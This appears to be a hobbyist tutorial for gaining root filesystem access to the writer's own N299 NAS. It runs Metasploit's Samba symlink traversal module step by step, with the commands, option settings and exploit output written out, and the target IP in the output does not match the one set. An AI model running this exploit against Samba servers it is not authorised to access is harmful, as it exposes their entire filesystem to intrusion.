NOTE: Because the Video folder is scanned by the Media Server, you must stop the Media Server from the NAS menu before running this exploit.
To access the root filesystem of the N299 we will use BackTrack Linux.
Launch a terminal window and from the terminal we run
After some loading the prompt will be msf >.
At this prompt we type search samba and we will get a list of the available exploits:
msf > search samba
The command will list all available exploits.
Load the first one with the command:
msf > use auxiliary/admin/smb/samba_symlink_traversal
Let's see what the options are:
msf auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

Let's set the options:
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.1.2 (change the IP address to your own NAS IP address)
msf auxiliary(samba_symlink_traversal) > set SMBSHARE Video (I set the Video folder from the NAS menu to be writable for everyone)
msf auxiliary(samba_symlink_traversal) > set RPORT 139
msf auxiliary(samba_symlink_traversal) > set SMBTARGET roothack (the folder inside the Video folder where the root directory will be mounted)
Now we run the command exploit:
msf auxiliary(samba_symlink_traversal) > exploit
Connecting to the server...
Trying to mount writeable share 'Video'...
Trying to link 'roothack' to the root filesystem...
Now access the following share to browse the root filesystem: \\10.1.10.10\Video\roothack\
Auxiliary module execution completed
Now if you go to the Video network folder, you will see a roothack folder containing all the files of the root filesystem.